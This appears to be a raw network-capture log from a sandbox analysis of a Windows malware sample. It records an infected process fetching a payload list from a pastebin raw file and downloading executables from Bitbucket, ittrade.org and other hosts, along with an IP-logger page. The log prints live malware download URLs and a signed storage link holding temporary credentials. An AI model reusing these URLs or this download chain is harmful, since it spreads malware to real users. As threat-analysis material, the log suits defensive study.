                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=liFLCiAWd0sLOQvTs%2FAHWkmuNQt1y9AZyGFnC9PyqjK3TiVQAPXCwgR9k50vWChhwFCTTPhZol8pZIu9vF5a2OVy%2FsNGrkwSqKQ2xSI1UC7%2BXDhDnKHUxVOkXxYPRFk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201fcea809f5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:57 UTC | 131 | IN
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
2024-03-11 02:30:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 55598 | 172.67.200.219 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:56 UTC | 38 | OUT | GET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
2024-03-11 02:30:57 UTC | 1188 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6IjN4TmxFVUNjQmxNNHIxVm9iNHpYbkE9PSIsInZhbHVlIjoiSjhtM25aeUJ3Y0lqbks1RWNoUU5uMGROV0F4RVVoTlNHa3ZFcHd4dnhYMlNFWE9KQU9ubDBZNERyMDdXRzJUb2hSWjRYOUZSZnBnVTBnTlN0STRRQ3JUdUVTRDNNcSsxRXk5MmNQcXNVWmxrSjNZbXdHTmtnaHg0RHdyQ0hCNW4iLCJtYWMiOiIzNDI1MmRmZDljMzk2N2RkY2IzOTVjZWZlODNkY2QzY2M3ZTJiODY1YjRmOTZjMDRjNDYxODY2YjllYWY4MzYzIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6IjVNUmlmWUJMOXFYWHZncm41Y1BuNUE9PSIsInZhbHVlIjoiamR3b2RlUG9QSWcybWwwSmU5NXVDdFBIeDhzVUpxdmx2NHppdCszcUxhc2dFWWtQOE9Hck55SWJyZ1hBZFBrNGVBV29sQzZBQmdBZ0IyYlJES3QvYnd2VHNsR3JFYXFra0w4OEFlV0psZm8yZkNoTFJEZWlVT1EwU3dENUl6RHQiLCJtYWMiOiIyN2NmY2U5MGUyNTc1NWVkMmFkNTYyNjlkZDVkMDUxMjBhY2M4M2YxYjRkNDI3YmI2ZDRhZWNmODQ2MGYwYjdjIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:57 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
2024-03-11 02:30:57 UTC | 395 | IN
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CecNRcm0f0xcNUUSPgKG3Gxmt%2F7oJUacQOD%2F4MAEsLd0QnTGsPpFXQS%2F6vNpPCWRj1vQaQFuuVuui0QMcFut65JXfdvxHwW6eACAGkPSlk7wJgDbK%2FmBaU9U"}],"group":"cf-nel","max_age":604800}NEL: {"su
2024-03-11 02:30:57 UTC | 1369 | IN
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
2024-03-11 02:30:57 UTC | 1369 | IN
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
2024-03-11 02:30:57 UTC | 880 | IN
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
2024-03-11 02:30:57 UTC | 6 | IN | Data Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
2024-03-11 02:30:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 55602 | 172.67.169.89 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:57 UTC | 41 | OUT | GET /RNWPd.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: yip.su
2024-03-11 02:30:57 UTC | 908 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            memory: 0.36199188232421875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:57 +0000
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=44sLBJ%2FbRTv2dExM1OnXYs7kX3CaB%2BdoJhsQGEUdWFTxzTRTHj0hAuQ8On1278YnGkjT39rL8KPVkkeLk%2Bc81oXyJv%2Fnq3%2BznVFffYefI626C4%2FUcA2J%2B28%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282020cbfd69e3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:57 UTC | 461 | IN
                                                                                                                                                                                                                                                            Data Ascii: 1d16<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69
                                                                                                                                                                                                                                                            Data Ascii: visit-after" content="7 days" /><meta name="keywords" content="" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:image" content="https://cdn.i
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                                                                                                                                                                                                                                                            Data Ascii: display:none}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-dela
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 79 6c 65 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20 5f 70 3b 0a 09 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78
                                                                                                                                                                                                                                                            Data Ascii: yle><script>var _p;if(navigator&&navigator.userAgentData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 70 72 6f 63 65 73 73 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: rowser before processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:cent
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e
                                                                                                                                                                                                                                                            Data Ascii: auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain">
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC148INData Raw: 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ion='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID    Process
32          192.168.2.5  55601        104.20.68.143   443               44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                Bytes transferred  Direction  Data
2024-03-11 02:30:57 UTC  50                 OUT        GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
2024-03-11 02:30:57 UTC  395                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 4
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282023d8b569e3-LAS
2024-03-11 02:30:57 UTC  800                IN
                                                                                                                                                                                                                                                            Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID    Process
33          192.168.2.5  55590        104.192.141.1   443               44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                Bytes transferred  Direction  Data
2024-03-11 02:30:57 UTC  83                 OUT        GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
Host: bitbucket.org
2024-03-11 02:30:57 UTC  4234               IN         HTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                                                                            x-usage-quota-remaining: 998501.513
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
                                                                                                                                                                                                                                                            x-usage-request-cost: 1140.03
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: c289a43347b744b9
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ 
https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.032482
                                                                                                                                                                                                                                                            x-usage-system-time: 0.001719
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            x-served-by: e7bee276ad99
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 69
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: c289a43347b744b9
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.05568814277648926
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3890
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID    Process
34          192.168.2.5  55604        172.67.177.133  443               44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                Bytes transferred  Direction  Data
2024-03-11 02:30:58 UTC  106                OUT        GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: ittrade.org
2024-03-11 02:30:58 UTC  682                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 2
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FmxgvwGyHdHpQrYbtyJF8Y%2BdbVUnL%2F5G8qgePzIKjgnZmTKgrcDicotEp6GYgcjwMF3iH86RZm6glzvnRS5frP6RLuTq%2FAtIt2gjy2NCl0QO%2B8LsoECLKBqSaQFYNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202829bb09ef-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            35192.168.2.55560352.217.234.5744344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1119OUTGET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
                                                                                                                                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            x-amz-id-2: pN+25j41gyb74EHB+eJy49Vdf4NthgnSijpKpjdohOhz0WkTbNVlNkts5bnBrqPEr8ROg13kTBk=
                                                                                                                                                                                                                                                            x-amz-request-id: D1AT10ZBFPRP300R
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
                                                                                                                                                                                                                                                            ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
                                                                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                            x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="a02.exe"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Server: AmazonS3
                                                                                                                                                                                                                                                            Content-Length: 323584
                                                                                                                                                                                                                                                            Connection: close
